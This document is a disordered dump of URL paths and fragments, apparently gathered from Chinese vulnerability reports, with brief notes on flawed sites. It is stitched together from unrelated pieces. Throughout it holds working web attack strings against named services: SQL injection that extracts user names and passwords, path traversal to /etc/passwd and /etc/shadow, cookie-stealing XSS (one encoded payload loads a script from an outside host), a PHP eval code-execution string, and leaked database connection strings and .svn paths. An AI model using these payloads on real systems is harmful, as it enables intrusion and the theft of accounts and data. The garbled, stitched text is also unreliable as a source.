/gao_neirong.php?tid=1326145 /taskadd.php?ID=2785%20%3Ciframe%3E%3C/iframe%3E /register/new/zone.aspx?fid=25 www.fehu.cn/news_detail.php页 /html/anli/,里面的客户案例,都存在同样的漏洞。而且这个CMS貌似还在收费! /member-sendMsg.html /index/index.action /getProductDetail.action?software_id=0aff22e4-e73c-490b-900f-964924216c3b /admin/ / / /common/common_info.action?wid=201206061647101009 /common/common_info.action?wid=201206121017281106 /common/common_info.action?wid=201205251136581055 /common/common_info.action?wid=201203290850081045 /common/common_info.action?wid=201201191129341000 /common/common_info.action?wid=201111081709461008 /common/common_info.action?wid=201109101627471006 /common/common_info.action?wid=201109101627471006 /common/common_info.action?wid=201207050924351000 /common/common_info.action?wid=201112021126461037 /common/common_info.action?wid=201206111446131088 /article/article!detail.action hyxb.sz.tsinghua.edu.cn/ROOT /这个站点 /index.php?s=/article/show/id/{${phpinfo() /index.php?s=/article/show/id/{${eval($_POST[cmd]) /index.action /cgi-bin/mmsupport-bin/readtemplate?uin=&stype=&promote=&fr=&lang=zh_CN&ADTAG=&check=false&t=w_password_phone&method=mobile /game_class.php?mid=4&sj=828&yqid=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg /phonelist.php?c=E&do=one&sj=SH8010C&yqid=1&jx=12 /hits.php?fid=8049 //lottery/userzj.action?username=15538228&lottery=300 /k2x/page/login/login.php /k2x/page/profile/avatar.php?aui=dXNlcl9pZD00NDI2MyZjaGFubmVsX2lkPSY= /k2x/smarty/templates/avatar/81289_20_20.php /k2x/page/login/login.php /cgi-bin/common/cgi_view_album?singleurl=1&uin=1341413415&albumid=V10fl8eT3mFzob&t=0.10085723901044841&verifycode=&question=%E5%AF%86%E7%A0%81%E6%98%AF%EF%BC%9F&output_type=json&refer=qzone&plat=qzone&json_esc=1&g_tk=5381&answer= /frg.php?sid=s1 /tv/2012zt/xyjztzh/ / /pwset/ / /Java/jviewer.jnlp /news/detail.aspx /index.php?app=order&act=check_coupon&coupon_sn=1&store_id=1 /index.php?app=order&act=check_coupon&coupon_sn=1&store_id=1%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%280x7e,0x27,%20sh_member.user_name,0x27,0x7e,%20sh_member.password,0x7e,0x27%29%20from%20sh_member%20limit%200,1%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1 /index.php?m=member&c=index&a=register&siteid=1 php:578 /WebReport7/ReportServer?op=fs_load&cmd=fs_signin&_=1347302374226 / /WebReport7/ReportServer?op=resource&resource=http://www.baidu.com/ /WebReport7/ReportServer?op=resource&resource=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /comment.php?types=3&sj=&yqid=0&sid=1341%20and%20%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20%28Select%20version%28%29%29%20from%20information_schema.tables%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29%23-- /bfy_jm.asp?id=317840x /continuum/security/login.action /show.action?op=Area.index&modelId=22 /www.100e.com.rar /www.100e.com.rar /Unicom114/index.html /HBE/Hotel/WebHotelEntranceAction.action /flow/Auth.aspx /v/home/Default.aspx www.js165.com/v/home/newsinfo.aspx?nid=2439432 newslist.asp?NodeCode= /myspace/voice_show.asp?ID=313921&Name=%22%3E%3CScRiPt%20%3Ealert%28%22magic%22%29%3C%2fScRiPt%3E&ProductID=2953&ProductName=%20%20%810%884%810%870%810%872%810%867%A1%C0%A8%BA%810%887%810%844%810%887%810%8A7%28%810%874%810%898%810%872%A8%BA%810%864%810%859%810%877%810%883%29%282009%810%872%A8%BA4%810%888%810%870%29 /myspace/某某某(用户名) / /card/exchange/index?keyWords=1234′ /profile/mine /profile/"+c_userid+"/icard /card/exchange/api/invite?cardUid=xxxxxx&ajax=1 /xsstest.php /shangxi/huikancon_article.php?cls=35&class_id=113&article_id=168 /musiclist.aspx?musictype=1&searchType=1',1,1--&searchKey= /musiclist.aspx?musictype=1&searchType=1',1,1;select--&searchKey= /musiclist.aspx?musictype=1&searchType=1&searchKey=%E5%AD%99%E4%BF%AA /musiclist.aspx?musictype=1&searchType=1&searchKey=%E5%AD%99%E4%BF%AA%27,1,1,1-- /ktv_new/in_ktvroom.aspx?serverid=66&userid=wangjing01 14.0 /address/remove/279129 修改其中的id即可删除别人保存的地址 www.jiuxian.com /topic/3znq/hyzc/index.html /index.php/crowdtest/game/showGame(需登陆) /dianwoba/grid/c.jsp?t=3 /dianwoba/product/pd.jsp?pid=900268 /dianwoba/ipforward/enter.jsp www.7road.com /nsedoc/scripts/http-methods.html /nsedoc/scripts/http-methods.html /nsedoc/scripts/http-methods.html /nsedoc/scripts/http-methods.html /o:microsoft:windows //WebSource/WebSource.aspx?Source=eqf&SourceSunInfo=408293918256024A0A0A1AGabOlS&Url=http://www.wooyun.org /jx3/zuimei/index.php?act=show&uid=4200 /view.php?id=796 /dianwoba/grid/liansuo.jsp?lid=22 /ssc/t.jsp?userId=16128627&lotteryId=300 /svqd/jsp/svqd/zhuce/zhuce.jsp /svqd/ /api/error_report/show?source=ipad /phonelist.php?do=one&jx=11 /space/1464 /subject/kn2010/ /cjc/editor/down.jsp?file=../../../../../../../etc/shadow /data/avatar/011/14/10/08_avatar_small.jpg/1.php zhubajie.com action /member/index.php?uid=q18682078086&action=article /vuldb/ssvid-20949 /e/.svn/entries /.svn/entries /jsp/pvbi/.svn/entries /.svn/entries /.svn/entries /.svn/entries /.svn/entries / / / /mine的Board里可以直接嵌入脚本代码。 /Cun/CodeQuerryQuestion.aspx?questionID= / /web/Uploads/ / /sso/sys/main.action / /info_news.php?id=1364 /topics-5396.html /phone!getPhoneModel.action?modelEntity.prefix=M&brand=ZTE&brandCN= www.anyview.net www.celedial.com www.datoutie.com www.labi.com www.yitongbu.com http://www.site.cn:85/report/download.php?pdf=../../../../../etc/passwd /taobaoSearch.action?keyword=wooyun.org /study/bilingual/1554271.shtml在网友评论处 /images/logo.gif /201002/elantrano1/blog.php?userid=2332992 /201005/dh/d.php?zpid=307975 /wp7/view-id-85 /wp7/view-id-85 /wp7/view-id-85 /wp7/view-id-85 /wp7/view-id-85 /databak_fa1fb2 /Views/arts.aspx?ez=3 /search?client=aff-cs-360se&forid=1&ie=utf-8&oe=UTF-8&q=search%22+href%3D%23+onerror%3Dalert%28%27wooyun.org%27%29%3B%3E%3Cimg+src%3D%22%23 cehome,则执行跨站代码,如果不是默认主页,当访问http://i.firefoxchina.cn页面时,依然会执行跨站代码。 /huaiyun/mamashow_single.php?id=13 /api/getthread.php?cut=16&limit=6&tid=65024 /shopsystemF/checkLogin.action /login.php?url=http://club.weibo.com&entry=daren /cgi-bin/mail_spam?action=check_link&url=javascript:alert%28document.cookie%29 /TicketCard/login.action /?controller=person&uid=277827072 /website/Login.action /billing/billaddress-baid-12467-edi-1 /boss/index.jsp),左侧信息查询链接均采用GET方式获得用户数据,且没有对用户ID进行判断。 /index/list-fid-5-order- /index/list-fid-5-order- /pages/channel/actLoginAction.action /vip/ /index.php /xx.js /Admin/AdminPanel.aspx /JSP/ /?qa= /thread-index-threadid-141832-page-21.html / /logs/187251211.html /login!checkPw.action /bookshop/pagelayout.action?nodeID=272&releaselibID=3899&isceb=1 /bookshop/pagelayout.action?nodeID= /login.action?error=2&j_username=1&checkUrl=/member/member!input.action&url=null /books/bookslist.jsp /books/bookssales.jsp /media/medialist.jsp /common/playlist.jsp?url=&newstype=4&id=3896&nodeid=132&pubcompanyid=0&siteid=0 / www.goldmail.cn/about/hotspot/hotspot_detail.php?ID=-137+union+select+1,2,concat_ws www.goldmail.cn/about/news/news_detail.php?ID=-142+union+select+1,2,concat_ws /cgi-bin/mmsupport-bin/showresetpwd?uin=&stype=&promote=&fr=&lang=zh_CN&ADTAG=&check=false&t=w_password_phone&phone=1%22style=%22x:expression%28alert%28URL=1%29%29&country=A86&getmethod=web / ad.goodbaby.com/ad_alt_click.php?z=-6176+union+all+select+concat_ws /360doc.rar /pages/smb/products.asp?c=3 /pages/article-detail.asp?result=school&d=157 /pages/cms/upload.asp /,同理还有http://bbs.tp-linkmobile.com.cn。。。后面就不继续了,希望厂商还是控制下目录权限吧,好多个应用放到一个站。 /tips/goodbaby/stepbystep/Step_3.php?ContentKeyID= /album/album_album.php?albumid=4snme /cgi-bin/mail/redirect.cgi?http://www.wooyun.org /yesasia/loadframe.cgi?url=http://www.wooyun.org /?ie=utf-8&job_cit=None&job_dat=0_4294967295&job_edu=1_1&listType=0&oe=utf-8&rn[]=1&wd=%E8%AF%B7%E8%BE%93%E5%85%A5%E8%81%8C%E4%BD%8D%E5%90%8D%E7%A7%B0 /server-status /p/Searchpost/index?education=1%22%3E%3CScRiPt%20%3Ealert%28document.cookie%29%3C%2fScRiPt%3E&intime=[2012-09-15T00:00:00Z%20TO%20*]&intime_id=1&page=15&q=&stime=0 /blog/5064513 /201102/lhcs/list_e.php?id=518604 /JdVote/TradeComment.aspx?ruleid=订单ID /watch/show.php?mod=category&act=index&catid=6 /bbs/Admin/Label.asp?do=edit_label&realdo=edit&file=besttopic.tpl&folder=/Dv/ /feedback.php页面的contact和contactus参数存在漏洞。 /ihsdata/存在目录浏览漏洞 /ihsdata/company/ /ihsdata/meeting/ /mlocsoIndex.action /mlocsoIndex.action /phpinfo.php /chepiao/%3Cvideo%3E%3Csource%20onerror=javascript:document.write%28String.fromCharCode%2860,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62%29%29%3E.htm /chepiao/%3Cvideo%3E%3Ciframe%20onload=javascript:document.write%28String.fromCharCode%2860,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,49,46,109,97,103,105,99,120,115,115,46,115,105,110,97,97,112,112,46,99,111,109,47,120,115,115,46,106,115,34,62,60,47,115,99,114,105,112,116,62%29%29%3E.htm /club/admin/upload/1318226996487.jpg,习惯性地扫了下目录,爆出fckeditor编辑器,于是,各种漏洞一阵轰炸,发现可以遍历目录 /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../ /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../ /acegilogin.jsp /Modules/occ/pages/member/top_member.jsp /Modules/admin/business/pages/domain_audit_upload.jsp /Modules/admin/business/pages/domain_info_admin_password.jsp查询管理密码 /Modules/admin/product/pages/notify_modify.jsp /Home_noPassword.aspx / /qqmail/domainadmin.do?method=login / /index.php /g2/login.action / /cgi-bin/login / /system/login.do / /users/to-login/ /cgi-bin/notebooklist?ID=4894 /cgi-bin/feedbackinit?ID=5806 /Modules/agent/serv/pages/ /e/admin/index.php /g2/login.action postgresql://db.slot1.cth.155438.s.**.net:5432/cth-slot1 /mydns/recordsList.do /mydns/mydnsop/mydns_add"/ /mydns/mydnsop/mydns_update"/ /mydns/mydnsop/mydns_delete"/ mysql://61.155.152.**:3306/pdns?useUnicode=true&characterEncoding=utf-8 mysql://202.10.73.**:3306/pdns?useUnicode=true&characterEncoding=utf-8 mysql://202.10.73.19:3306/mydns?useUnicode=true&characterEncoding=utf-8 /search?lm=2&word= /job?jid=11111111111111&q=1111111111 /wp-includes/js/swfupload/swfupload.swf?movieName=%22 /rest/2.0/pim/contacts?method=add&app_id=20 /wp-includes/rss-functions.php /apc.php /.svn/entries /2012/09/16/zero-day-season-is-really-not-over-yet/ /money/view/show.php?t=bank&c=show_notice_detail&id=87703 /register/registerAction!invite.action /blog/5052230 /storage/login/login.action /WebSuperMarket/ /mutualpoint/ /sftcard/ /images/ /webio/ /web/ /SgcLMS/ /SgcLMS/authorization/learner/learner!gotoValidateInfo.action / / / / /admin/login.php /bank/ /bank/jybank/index.php /query/query.php /没发现什么问题 /brand.php?trade_id=54 /pass/register /pass/verifyPhoneRegTicket?phone=手机号码&ticket=验证码 /account/reg/mobile.htm注册支付宝时,会对手机号码做是否已经注册的验证,但是没有限制次数,导致可以在段时间(几分钟)内枚举出大量已注册的手机号,已经注册但未激活的手机账号,已经注册且和淘宝关联的账号(及账号的部分昵称) /upload.jsp /bbs/test.jsp /admin/目录下存在存在一个编辑器有安全隐患 /manage/ /manage/upfile.htm /new_exhibit/exhibit.html?id=1525 /console/ /sdxxw/login.action /query/Letvdiancard.jsp?cardnum=122111111111&cardpwd=99999999 /issp/pages/login.action /index.php?p=2 /index.php?/default/login/login /ajax/address.php?action=address_remove&id=850270 /test/webgame/index.action /coboportal/portal/itservice.ptview?funcid=showGSWZInfoLink&infoSortId=52802&infoLinkId=13962&viewJsp=../../WEB-INF/web.xml /index.do /index.do /.svn/entries /zlZLE2P /myapp/login.action /wiki/%E3%80%90QQ%E7%99%BB%E5%BD%95%E3%80%91%E4%BD%BF%E7%94%A8Implicit_Grant%E6%96%B9%E5%BC%8F%E8%8E%B7%E5%8F%96Access_Token /oauth2.0/authorize?response_type=token&client_id=216028&redirect_uri=http://open.z.qq.com/moc2/success.jsp&scope=get_user_info,add_one_blog,do_like,add_t,list_album /svn/trunk/draftCode/oauth2_client_side_side_effect/qq_oauth2.php /system/findPassword.do /wp-includes/js/swfupload/swfupload.swf?movieName=%22 /blog//wp-includes/js/swfupload/swfupload.swf?movieName=%22 /分站注册用户,用户后台可上传数据,但是上传数据过滤是用js过滤的,用firefox修改下过滤上传成功。见图 /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /coboportal/ /coboportal/wafplatform/login.jsp /coboportal/wafplatform/portletmanage.do / /album/js/album.js /120920/14/U1112845528/55e04373cab5931a.jpg /album/album_photo.php?photoid=69a5aa#viewpic /album/album.php /special/innotonglianzhan.action /HunanCity/ep/index.action?id=107 /showSrv.action?id=309392&catalog=%E5%9F%8E%E5%B8%82%E9%A2%91%E9%81%93 /sale/web_index.action?sptype=2 /shop/shopMobile_listMobile.action?curPage=80 /base/permission/login/login.action oracle:thin:@ sqlserver://10.11.11.111:1433;DatabaseName=crmdb sybase:Tds:10.11.11.222:5000/crmdb?charset=utf8;SELECT_OPENS_CURSOR=true;language=us_english mysql://127.0.0.1:3306/crm09 /crbt/queryStarAreaDetail.action?ringParam=4854 12.0 /hyinfo/action/FwcszsAction_index?type=1 /crossdomain.xml /cas/login /console/ /index.php?p=2 /shop/user.php?act=profile /others/xt/name.php /user/login.action jtds:sqlserver://115.***.***.29:1493/dxmms /editGroup.do /myfriendlistx.do#item_6 / /hyinfo/action/FwcszsAction_hyblzxx /hyinfo/action/FwcszsAction_hyblzxx /backend.php/interface/getdoc/?path=file/src/2012-09-21/xxx.doc&name=xxx.docx /adfront/click?u= /yiyun/security/toLogin.action oracle:thin:@127.0.0.1:1521:ebackup /PPerson/JJPerson.aspx?JID=24279 /tech_support/email/user/ufeedback.asp?idcode=【工单编号】 /fillweb/kcoin/setPayPwd.jsp?passport=%3Cscript%3Ealert(/valo/)%3C/script%3E /fillweb/kcoin_error.jsp?errorMessage=%3Cscript%3Ealert(/valo/)%3C/script%3E /index.php?appid=4&tid=28 /wiki/index.php?doc-create /yycs/gamequiz/index.php?act=showCard&pid=12024 /sedm_core/ /ivod/i/home/VideoType.aspx?cid=88&typename=%E6%97%85%E6%B8%B8 /TrainQuery/iframeSellTicketStation.jsp /TrainQuery/iframeSellTicketStation.jsp /Dzsw/action/JgxxAction_hwyjl /index.php /bbs/ /bbs/viewthread.jsp /bbs/faq.jsp?action=message&id=24 /log /WooYun-XXXXX/ /regionTempAction.do?method=toForwardFindPasswordStyle /regionTempAction.do?method=resetPassword&idtagCard=用户ID值&authcode=Go8K7yp4TWy&rtEmail=邮箱地址 /content/1060 /1378148/ /thread-676-1-1.html /pc/login!chekLogin.do /book/list/%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28document.cookie%29%3C%2fScRiPt%3E /1378130/favorite?sk= /bang/search?keyword=1%3C%2ftitle%3E1%3CScRiPt%20%3Ealert%28/xss/%29%3C%2fScRiPt%3E /booklist/list/?beingsId=1034563&pi=0&sub=1%22%3E%3C%2ftitle%3E1%3CScRiPt%20%3Ealert%28/xss/%29%3C%2fScRiPt%3E /bang/?pi= /bang/search?keyword=1%3c%2ftitle%3e1%3cScRiPt%20%3eprompt%28910644%29%3c%2fScRiPt%3e /index/list?id=1%3c%2ftitle%3e1%3cScRiPt%20%3eprompt%28913007%29%3c%2fScRiPt%3e&type=tag /lianbo/i.php /.svn/entries /book/.svn/entries /book/images/.svn/entries /book/images/android/.svn/entries /download/.svn/entries /images/.svn/entries /lianbo/.svn/entries /lianbo/appdown/.svn/entries /lianbo/images/.svn/entries /lianbo/images/android/.svn/entries /lianbo/images/android_hd/.svn/entries /lianbo/images/ipad/.svn/entries /lianbo/images/iphone/.svn/entries /lianbo/images/wp7/.svn/entries /lianbo/images/wp8/.svn/entries /logs/.svn/entries / /playerInfo.php?id=4 /eoms4/portal/login.action /Login.aspx /index.php?c=fashion&a=fashion_detail&id=1 www.eset.com.cn /lixiaofeng/contentbowen.php?id=5 /admin/.svn/entries /admin/scripts/fckeditor.266/editor/.svn/entries /sql/.svn/entries down.17u.com/2010/pdf/index.asp?pdfaddr=133-1378.pdf down.17u.com/2010/pdf/index.asp?pdfaddr=index.asp down.17u.com/2010/pdf/index.asp?pdfaddr=pdf.xls / / /opencom/picture/fav/upload?app_id=314406&descript=标题&source_url=http://tieba.baidu.com/p/10000 /static/widget/common/header/images/logo_0577c8f4.png&callback= /hlogin.action /vsap/index.jsp /vsap/cpsp/login.jsp /vsap/Operator/OperatorLogin!toLoginPage.action /vsap/mobile/loginAction!login.action com:3306 /bolt/home/agree.htm www.xxxx.com"/ /bolt/member/preEditMember.htm /movie/show.php?id=7759 /.bash_history / /showFeedback?pageNo=23 /feedback/ /images/ www.yonyou.com /news/pages.php?id=70 /resources/uploadify.swf //doUpLoadToTemp.jsp /resources/images/cancel.png /resources/images/liulan.png /uploadTemp/2012-09-21/"+value+ /rr.js /这个网站是dota2的官网,我们进行扫描,后台地址为http://dota2.replays.net/hero/login.aspx aspx?id= /cgal/index1.aspx),教务系统有535所学校在用,貌似这个系统有2个版本,有一个较新的不行,但是大多数都是老版本,可以成功利用该漏洞对服务器攻击,差不多可以影响上百所高校教务系统吧。 /oauth/2.0/authorize?scope=super_msg&response_type=token&client_id=RCKbWANx8KewnXs9rwGWFtZV&redirect_uri=http://lvtu.qunar.com/mobile_ugc/web/album.htm?albumId=4228 /oauth/show?which=AuthorizePage&which=ConfirmPage&response_type=token&client_id=100244931&redirect_uri=http%3A%2F%2Flvtu.qunar.com%2Fmobile_ugc%2Fweb%2Falbum.htm%3FalbumId%3D4228&scope=get_user_info,add_topic,add_one_blog,add_album,upload_pic,upload_pic,add_share,add_t,add_pic_t,del_t,get_repost_list,get_info,get_other_info,get_fanslist,get_idollist,add_idol,del_idol,get_tenpay_addr&src=1 /mobile_ugc/web/album.htm?albumId=4228存在xss漏洞) /f/commit/share/openShareApi?title=title /static/images/imgshare/preview_img_small.jpg&url=http://www.wooyun.org /f/commit/share/openShareApi?title=title&desc=&url=http://www.wooyun.org',videos:{"video_r":"","video_s":"","pkey":""}};alert("url");var /cart/ /login.html /forget/send_way /forget/send_way /forget/verify/mobile / /mobile/index/topic?id=2 /mobile/detail/8888888%3Cscript%3Ealert(document.cookie);%3C/script%3E%3C!-- /forum/ShowContent/ajaxNewComment?groupId=60&subjectId=82016&content=%3Cimg%20style=%22border:10px%20solid%20red;position:fixed;top:0px;left:0px;width:9024px;height:5100px;%22%20onmouseover=%22alert%28%27baba%27%29;alert%28document.cookie%29;%22%20/%3Ea%E5%95%8A%E5%93%A6%E5%8F%91%E6%96%87%E5%8F%91%E6%96%87%E5%AE%89%E6%85%B0%E5%AE%89%E6%85%B0%E6%B3%95%E5%98%8E&replyToInfoStr=&position=#pageOffset=2&layers=1 /search.php?keywords=a%cf'+or+1=1 /mo_service.shtml?path /mo_service.shtml?rtx/download/AppIMWatch.txt /mo_service.shtml?school/001.doc /l4yn3/ /ugg/article/details/3953137 /captcha.php / /customer/ /sms_admin/ /sms_admin/admin.php?what=1_1_1_1 /groupBuy/listOrderManage.jsp /login.jsp /j_spring_security_check?j_password=a&j_username=admin /j_spring_security_check?j_password=a&j_username=admin /62%CE%B1/index.asp?id=flv /news.php?id=5 /s/nl.php?act=search&k=8 /admin/即可直接进入吉林互联星空管理后台,任意发布内容和删除内容。 /shoplist.aspx?RackCode=A06 /shoplist.aspx?RackCode=A06%27%20and%20%271%27=%271 /shoplist.aspx?RackCode=A06%27%20and%20%271%27=%272 / /562.html /getOriginal?callback=jQuery16109319937340915203_1348642196756&q=T7n6r0L&_=1348642200976 /T7n6r0L /getOriginal?callback=jQuery16109319937340915203_1348642196756&q=T7n6r0L&_=1348642200976这个地址返回的内容也能够判断出,传入到callback的参数就是我们voteUrl的值。 /t/cssjs/439756/script/page/home.js /getOriginal not(.processed) /getOriginal请求资源。在这一步中执行我们的js代码。 /cgi-bin/format/view.cgi?id=20 / /PmtListFaq.aspx?QaClass=3 / / / /几个管理员的密码: /,有些账户也是能登陆的,但是http://union.lenovomobile.com/没找到后台,所以就没深入了。 /,这个站我想客流量也挺大的,怎么还有明显注入呢? /www/mb/js/mi.TalkListRich_120921a.js这个js文件中有如下代码: /www/mb/js/mi.Music_120821.js文件中。 /url_player.html?song=%esong%&singer=%esinger%&url=%songurl%&stream=0&songID=0 10px /survey_robot/db.asp /survey_robot/nimda/login.asp /info/yp/product.php?prowhere=1 /info/member/list.php?modelid=10 /dz15/home.php?mod=space&uid=1177871&do=blog&id=7279 /xxx.jpg","extraData":{"smallest":{"w":119 /x.jpg\ /ajax/gochklogin.ashx?Email=-1%27%20or%2032%20%3d%20%2730&Pwd=123456&r=0.6934755546958449 /showfit.aspx?GdsID=%22%20onmouseover=alert%28document.cookie%29%20// //mormhweb/ggxxfw/wbyyzj/201105/t20110529_1905.jsp?height=661 /Dzsw/action/CaptcaAction_validateQueryCaptca /Dzsw/action/JgxxAction_index?type=1 /ewebeditor/admin/default.aspx /webbaaliyun/jumpFindPwd.action /search/list.html?k=%3Cscript%3Ealert%281%29%3C%2Fscript%3E /union/admin/login.jsp /service/tickets_inquires/tickets_and_inquires.shtml /ex/savefile?files=[{name:%27273%32.rar%27,cid:%2773848F3D47DAC34A23F7B860DD90B9A9BD8BA32B%27,gcid %27%27,url:%27http://dl1.c6.sendfile.vip.xunlei.com:8000/2734%252Erar?key=953c13cdf61ed238b0d1813c86e8e941%26file_url=%252Fgdrive%252Fresource%252F6B 1662338302}]%22%29%29;eval%28%28%22alert /weibo/application/upload/2830631087/e71409fe5075a0c5888c3d6e50b298c8.txt /manager/html/ /upload.php /ProductList.htm?Cid=606&rypId=608&zhId=605&mid=100&Keywords=%22%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3B%3E+%2Ctitle%2Cbrand%2CcloumnName%2Ckeywords%2CarticleRuleTitle&searchlist=1&isKeyCommendClick=1&topKeywords=%22%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3B%3E+&x=39&y=19 /phone.php后将会自动显示手机的 /account/reg/email.htm /GetSomeomeDoingList.do?userId=他的人人ID&curpage=页码从0开始计数 /business/v3/index.html com.xianguo.book/shared_prefs/xg_book_config.xml com.xianguo.pad/shared_prefs/config.xml.xml /manager/html /labs/tools/pentest/reduh /jspspy/reDuh.jsp /jspspy/reDuh.jsp /campus/job_list.php?t1=campus&positionId=1 /campus/job_list.php?t1=campus&positionId=1 /campus/job_list.php?t1=campus&positionId=1 /campus/job_list.php?t1=campus&positionId=1 /display.action /aaa/selfservice/selfservice.shtml?return_url=http%3A%2F%2Fln.vnet.cn%3A9008%2Fweb%2Fwebrlogin.do&flag=1 /myinfo.jsp /product_list.jsp?searchType=search /myinfo.jsp /agency/auth/applyStep2?agencyType=1 /AdminiStrator/MIR_MainTech_List.aspx。我想有教师列表为什么不能有管理员列表? /AdminiStrator/MIR_Admin_List.aspx /.svn/entries /fckeditor/.svn/entries /.svn/text-base/index.jsp.svn-base /doc/.svn/entries /forum.php /home/error.php /member/reset_password.php?auth=70adcfad448d76c0b70480d787f734&id=2544380&t=1348903015 /member/reset_password.php?auth=70adcfad448d76c0b70480d787f734&id=2544380&t=1348903015 /1844269/ /1 /member/forgot_begin.php /en/uploadfile/test.txt /index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php /museum/index.html /pIQKKz /robots.txt/admin.php /NPELS /NPELS/CommonService.asmx /NPELS/CommonService.asmx /NPELS/CommonService.asmx/GetTestClientFileList?version=1 /NPELS/CommonService.asmx/GetTestClientFileList?version=../../ /npelsv/editor/editor.htm /WebAdmin/NewsDetail.php?ID_News=4320 /WebAdmin /guild.do?method=enter_addguild /index.php?task=cms&id=-1+%2F*!UNION*/+ALL+/*!SELECT*/+1,2,3,4,GROUP_CONCAT%28TABLE_NAME%29,6+FROM+INFORMATION_SCHEMA.TABLES+/*!WHERE*/+TABLE_SCHEMA=DATABASE%28%29-- /mobile?tg=10046&from=home&adtag=profile_mobile /reg_ok.asp?id=46 http://app.ps.cn/web/webapp!openIndex.action /m/index.php?a=quit[/img /shtml/mobile_01.jsp xm.gov.cn /huabei/score.action /ic/login.jsp /ic/user/logonForm.action?url=/login.jsp /agentlist.asp /admin /login/是一个用户登录的页面,但是这个页面的中的背景图片是动态调用得到,具体URL是 /login/image.cfm?x1=0&y1=0&x2=1&y2=1&format=&width=../&height=161&assetid=73806%20and%201=@@version /registration/getinfo/detailinfo.php /lxcali.action /question.php /resin-doc/viewfile/?contextpath=&servletpath=&file=/WEB-INF/web.xml /WEB-INF/web.xml /WEB-INF/web.xml /servlet/DisplayChart?filename=index.jsp /servlet/DisplayChart?filename=index.jsp /tabid/47316/ctl/Edit/mid/118574/InfoID/378661/Default.aspx /files/meizhuang.php?typeid=49 /shop/sales/html/order_check.html?order_id=132043 /MobileApp/soft/findMobileApp.action?ksoftid=2542 /soft/info.action?softId=3843 /music/center/loadCenterIndex.action /sxltq1/front/card.action /web/Search/productDetail.do?product_id=4073 /1.txt / jf.10010.com//order/userEcardAction.do?command=submitUserCart&giftId=E21012&tm=xxxxxxx /web/BankCharge/BankChargeInit /paperdetail.aspx?id=1075 /tool/book/add/Book.aspx?id=3152 /single_info/selectlogin_1.asp /wwwroot.rar”,用迅雷尝试下载,成功下载到本地,得到一个大小为18.4MB的wwwroot.rar文件。解压缩之后,发现其中有个Login.asp文件,打开一看,开头有一句“DBConn.Open /vichy2010/s.php?id=331 /vichy2010/s.php?id=331 /phpyun_2.4_GBK_Beta.zip index.php?act=ajax&task=delupload将调用model/ajax.class.php中ajax_controller类的delupload_action函数 /index.php?act=ajax&task=delupload /course/?id=1 /FAQ/index.asp?FAQType=1 /disktest/task.aspx?guideid=177 /tool/book/add/Book.aspx?id=3031 /disktest/QuesQuiz.aspx?courseid=8 /disktest/question.aspx?guideid=1145 /admin/index.htm /APPStatistics/Report/FeedBack.aspx /report/search /report/lists /report/edit /report/put /report/del /report/lists,可以查看其他用户的邮箱地址和IP /report/search/0/0/2 /report/search/0/0/2,“2”这个位置有SQL注入点,是MYSQL库 /amfphp/browser/ /af/af.html?appid=10021&lang=2052&t=1349190084396&u=888888 /af/af.html?appid=10021&lang=2052&t=1349190084396&u=888888 /af/af.html?appid=10021&lang=2052&t=1349190084396&u=888888%3Cp%3E%3Ca%20href=%22javascript:alert(document.cookie)%22%3E%E6%9F%A5%E7%9C%8B%E8%B5%84%E6%96%99%3C/a%3E%3C/p%3E /superstar.php?mod=search&searchid=1&searchsubmit=yes&kw=\%27 /af/af.html?appid=10021&lang=2052&t=1349190084396&u=888888%3Cimg%20style=%22display:none%22%20src=%221%22%20onerror=%22alert('xss')%22%20/%3E / /2.aspx /task/2010-07/11/358933/v6cxt6lf.txt /task/2010-04/19/276112/l8v40dx3.txt /task/2010-08/25/408398/vnwpl53p.txt /task/2010-10/10/458932/3x3dz8ag.txt /task/2010-02/28/234585/li2c18m0.txt /100ebooks/ProductsDetail.asp?MainProductID=2154 /100ebooks/ProductsDetail.asp?MainProductID=2154 / /discuz/admin.php /music/province/prov_index.action?provinceId=059 /1.asp?s="+str+"|"+cv /1.js /分站下面有 /2-8254/ /wawa/app/ /lod/hxsd_wjdc/cha1.php /hyinfo/action/JgxxAction_hwyjl?lx=00 /indexFrame.php#showCh(833,10,0,-1,1,1) /admin/login.php这个是后台登陆地址! /files/manucompare.php?manu_id[]=60&manu_id[]=50&manu_id[]=64 /pwview.php?id=51 /ajax/nipass.php?crumb=2ddbe31c540b024d39cd3d6e63641816&mobile=13********7 /feedback.html / /f/search/res?ie=utf-8&qw=gsid%3D3_5 /?gsid=****** /pay/checkout www.yeepai.com登陆账号点充值 /cgi-bin/admin/answer.cgi?id=85&action=enter 